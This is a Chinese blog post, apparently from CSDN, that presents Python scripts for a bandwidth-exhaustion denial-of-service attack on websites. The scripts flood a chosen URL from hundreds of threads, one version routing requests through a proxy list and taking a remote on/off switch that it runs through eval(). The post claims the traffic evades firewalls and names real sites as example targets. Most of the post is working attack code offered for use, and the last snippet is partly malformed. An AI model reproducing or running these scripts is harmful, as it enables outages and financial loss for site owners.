针对网页流量的Dos攻击脚本(使用代理服务器)

最新推荐文章于 2022-04-17 15:00:44 发布
最新推荐文章于 2022-04-17 15:00:44 发布
阅读量1.9k 收藏 3
点赞数
分类专栏: python 渗透测试相关 工具源码 文章标签: 脚本 服务器 dos domain exception
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yatere/article/details/7612214
版权


某目标网站,为虚拟主机,如果ISP限制月流量为20G,那么我们可以在短暂1-2天内消耗完其流量。(取决于你的机器)

方法原理如下:

1.找到目标网站大文件(页面)地址

2.多线程访问(下载)该地址


(注意:由于完全是出于模拟真实用户,所以不会被防火墙屏蔽掉)

(以下以hao123为例子而已)

一: 其中以上思路中的第一点 可以通过google浏览器的审计功能实现


如图,我可以得到几个大文件地址。


二:

找到地址以后,可以通过脚本程序实现多线程访问,不停消耗其网页浏览。

以下是我的机器运行程序后的截图(2 M adsl 仅10个线程,可以再加线程),我的接收也就是目标网站的消耗流量了(才几秒钟而已)。


可见效率还是不错的。

好了,脚本代码如下:

(注意,代理服务器需要放入proxy.txt文件中

格式为:

ip:port

一行一个)


import socket,random,threading,time,os,sys
import urllib.request as ur
socket.setdefaulttimeout(5)
os.chdir(sys.path[0])
domain='www.net'


tno=500

proxylist=[]

a=open(r'proxy.txt').read().strip().split()
for i in a:
    proxylist.append(i.split(':'))



target=['','index.asp','img/css.css','img/x.gif','img/x.jpg','img/x.jpg']

target=['','index.asp']
data='''GET http://%s/%s HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.46 Safari/535.11
Accept: */*
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Referer: http://%s/

'''

no=1

plock=threading.Lock()

ok=False


def geturl():
    global no
    while True:
        time.sleep(1)
        while ok:
            proxydet=random.choice(proxylist)
            proxy=proxydet[0]
            port=proxydet[1]
            url=random.choice(target)
            da=data % (domain,url,domain,domain)
            try:
                if not plock.locked():plock.acquire()
                s=socket.socket()
                s.connect((proxy,int(port)))
                s.send(da.encode())
                dd=s.recv(4024)
                print(' ok ',no)
                no=no+1
            except Exception as err:
                pass
            finally:
                s.close()
                if plock.locked():plock.release()


def a():
    global ok
    url=r'http://www.xxx.com/xxx.txt'
    try:
        data=ur.urlopen(url).read().decode()
        data=data.strip().split()
        for i in data:
            dom,yes=i.split(':')
            if domain==dom:
                ok=eval(yes)
    except:
        ok=False

for i in range(tno):
    threading.Thread(target=geturl).start()

while True:
    time.sleep(5)
    a()






非代理版:


import os,socket,time,threading

data='''GET / HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.79 Safari/535.11
Accept: */*

'''

domain='www.xxxx.net'
tno=400
mylock=threading.Lock()

def geturl():
          global data
          da=(data % domain).encode()
          while True:
                    try:
                              if not mylock.locked():mylock.acquire()
                              s=socket.socket()
                              s.connect((domain,80))
                              s.send((data % domain).encode())
                              s.recv(2040)
                              print('ok')
                    except Exception as err:print('err:',err) ;pass
                    finally:
                              s.close()
                              if mylock.locked():mylock.release()
          

for i in range(tno):
          threading.Thread(target=geturl).start()



import eventlet,time
from eventlet.green import socket
data=''qq HTTP/1.1
Host: qq
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.97 Safari/537.22
Referer: http://hb.qq.com/news/reganmain/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: RK=NcDPkbje2o

'''
def send1():
    s=socket.socket()
    s.connect(('qqm',80))
    s.send(data)
    s.close()

send1()
pool=eventlet.GreenPool(512)
while True:pool.spawn_n(send1)





Yatere
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dos攻击脚本
Dou_Hua_Hua的博客
09-28 652
#!/usr/bin/env python import socket import time import threading #Pressure Test,ddos tool ​ #--------------------------- MAX_CONN=20000 PORT=80 HOST="www.zhaihongyu.tech"#在双引号里输入对方IP或域名,要保证他联网了或开机了. PAGE="index.php" #-------------------
如何通过代理服务器发动DDoS攻击
u013468790的专栏
02-28 5469
提到DDoS攻击,大家会觉得很难,自己没有“肉鸡”(也称傀儡电脑),怎么发动得了?其实还有一种超级简单的办法,就算你一台“肉鸡”都没有,也可以发动DDoS攻击,不信?请看下文。  邻居老张自从建立了自己的网站后,大半空闲时间都耗费到上面了,来我家串门的次数也少了,就算来了话题都离不开他的“宝贝”——网站。这天老张来串门了,我琢磨着他又有什么问题要咨询我。果不其然,我们才聊了几句,就谈到了网站。
常用shell 脚本dos攻击防范,
05-26
常用shell脚本Dos攻击防范(自动屏蔽攻击IP).sh 一键部署等等 Linux系统发送告警脚本.sh MySQL数据备份单循环.sh MySQL数据备份多循环.sh nginx 访问访问日志按天切割.sh nginx.conf nginx访问日志分析脚本.sh shell.txt 一键查看服务器资源利用率.sh 一键部署LNMP网站平台脚本.sh 下载必看.txt 批量主机远程执行命令脚本.sh 批量创建100用户并设置密码脚本.sh 批量检测网站是否异常脚本.sh 找出占用CPU 内存过高的进程脚本.sh 更多精品教程.url 服务器系统配置初始化脚本.sh 本教程由我爱学it提供.url 查看网卡实时流量脚本.sh 监控100台服务器磁盘利用率脚本.sh 监控MySQL主从同步状态是否异常脚本.sh 目录文件变化监控和实时文件同步.sh 自动发布Java项目(Tomcat).sh 自动发布PHP项目脚本.sh
模拟解决DOS攻击的shell脚本
weixin_30500473的博客
08-15 266
方法1: #!/bin/sh While true do awk ‘{print $1}’.access.log|grep –v “^$”|sort|uniq –c >/tmp/access.log #netstat –an|grep EST|awk –F ‘[ :]+’ ‘{print $6}’|sort|uniq –c >/tmp/ac...
linux网站dos攻击自动封15分钟,简单的shell脚本结合awk实现防止对web服务的dos攻击...
weixin_36190910的博客
05-08 201
一 实验环境鄙人使用的是centos 6.8操作系统 需要安装iptables(常见的linux系统貌似都会自动安装iptables)这条可以忽略 awk也需要安装没有的话就用yum装下吧当然最重要的是web服务 我这里使用的是apache 对日志进行分析 当然你也可以分析其他的日志嘛 只是拿web服务来当例子而已二 脚本介绍使用的机制主要是对日志进行切片 对日志段进行分析 并...
Python代码实现http/https代理服务器脚本
01-01
一个几百行代码做出http/https代理服务器脚本,启动即可做http https透明代理使用 python proxy.py 8992 使用非阻塞io模式,性能还可以。 可以和浏览器一样保持长连接,代码有点乱,不管那么多了能跑就行 几百行...
windows7下关闭代理服务器脚本
03-29
windows7下关闭代理服务器脚本windows7下关闭代理服务器脚本windows7下关闭代理服务器脚本
pentmenu:用于侦察和DOS攻击的bash脚本
05-28
一个bash选择菜单,可快速轻松地进行网络侦查和DOS攻击 在必要时实施Sudo。 在Debian和Arch上测试过。 要求: 重击 须藤 卷曲 netcat(必须支持“ -k”选项,建议使用openbsd变体) hping3(或nping可以代替洪水...
脚本之家服务器故障导致网站无法访问
09-30
本次事件中,“脚本之家”的服务器遇到了故障,导致其网站无法正常访问,影响了用户的正常使用。以下是针对这个事件涉及的一些关键知识点的详细解释: 1. **服务器故障**: 服务器故障可能由多种原因引起,如硬件...
简单的DOS攻击
qq_43688708的博客
03-02 1万+
实现简单的DOS攻击,主要介绍了由python编写的hammer脚本和Hping3工具
利用Sniffer进行DOS攻击流量分析
08-12
利用Sniffer进行DOS攻击流量分析,亲。太贵了,文档没什么作用。
Dos攻击
调皮的写代码
06-07 2294
一、Dos攻击
DOS攻击
热门推荐
一个普普通通的博客
04-17 2万+
DOS攻击 0x01、什么是DOS攻击 DOS攻击不是DOS DOS攻击是利用程序漏洞一对一的执行资源耗尽的Denial of Service拒绝服务攻击 DenialOfServie != DiskOperationSystem DDoS分布式拒绝服务 DOS攻击拼的是各自的资源,效果比较差 而DDOS则是汇聚资源能力,多对一,属于资源耗尽型攻击 历史 以前:欠缺技术能力的无赖,我ping死你(最难缠的无赖) 现在:最强大最危险的攻击,攻击方式众多(专业化的要求勒索) 亲身经历:电商网站被勒索、Bi11
流量攻击
qq_40237472的博客
12-02 605
Rinetd重定向 1. 安装rinetd:apt-get install rinetd 2. 配置:/etc/rinetd.conf文件中输入bindadd bindport connectadd connectport4个参数即:侦听主机ip,侦听端口,转发主机,转发端口 3. 运行:rinetd: a) 查看运行进程:ps aux | grep rin...
Python 实现 DOS流量攻击
CSDN
03-10 9037
通过网络中存在的DNS服务器资源,对目标主机发起的拒绝服务攻击,其原理是伪造源地址为被攻击目标的地址,向DNS递归服务器发起查询请求,此时由于源IP是伪造的,固在DNS服务器回包的时候,会默认回给伪造的IP地址,从而使DNS服务成为了流量放大和攻击的实施者,通过查询大量的DNS服务器,从而实现反弹大量的查询流量,导致目标主机查询带宽被塞满,实现DDOS的目的。偏移值,当设置了偏移值的时候,系统默认根据ID号为单位对数据包进行分段接收,收到全部包时在进行组合,并传输给系统识别。
dos攻击mysql_dos攻击原理及攻击实例(带脚本
weixin_32753181的博客
02-06 292
dos攻击原理:DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。(百度百科说的,大概就是这么个意思)。dos攻击与ddos攻击的区别就是,它是一对一的攻击,而ddos是分布式的攻击,作为入门,作为菜鸟,我们他妈哪里有那么多肉鸡给你用。。。所以不过对付一些带宽小,内存低,cpu渣的小型web服务器还是ok的。现在,废话不多说,本地搭建一个web站点测试一下。测...
1.从零认识 TCP、UDP 协议到完成 DOS脚本攻击
E1even的博客
07-30 1118
声明: 这个系列的文章是很久以前写的了,保存再本地怕丢失了。文章里面有些图片转存失败,我也没有进行更正修改,因为图片实在是太多了。如果有要PDF带图的师傅,可以加我要PDF版本。(Q:1056391561) TCP、UDP协议到完成SYN—flood脚本攻击再到实现简易通讯 前言:看了网络上大部分文章,都不是很好理解,因此自己写下这篇文章,帮助后面的学习者更好理解。这里我将用通俗易懂的话语对TCP、UDP、协议漏洞、SYN攻击、简易攻击脚本五个模块做一个阐述 TCP/IP: 什么是TCP/IP协议 TCP/
几个应付DOS攻击的管理脚本
lht
01-03 178
$ cat dos_ip.sh#!/bin/bashnetstat -an|grep SYN_RECV|awk -F' ' '{print $5;}'|awk -F':' '{print $1;}'|sort| uniq -c | sort -nr | head -n $1 $ cat dos_attack.sh#!/bin/bashnetstat -an|grep SYN_RECV|awk -F...
DOS攻击工具——pentmenu
tlovejr的博客
04-11 4016
环境需求: 针对以上环境要求,推荐大家直接在kali上进行调试即可 bash sudo curl netcat (必须支持’-k’选项) hping3 (或 ‘nping’ 可以用来代替洪水攻击) openssl stunnel nmap whois (不是必需的) nslookup (或者 ‘host’ 命令) ike-scan 下载链接: 下载脚本: $ wget https: //raw.githubusercontent.com /GinjaChris /pentmenu /master /pe
jemeter脚本录制代理服务器设置什么
最新发布
05-18
使用 JMeter 进行脚本录制时,需要配置代理服务器以便 JMeter 能够捕获来自浏览器的请求信息。 具体的设置步骤如下: 1. 在 JMeter 主界面中,选择 "Options" -> "HTTP(S) Test Script Recorder"。 2. 在 "HTTP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值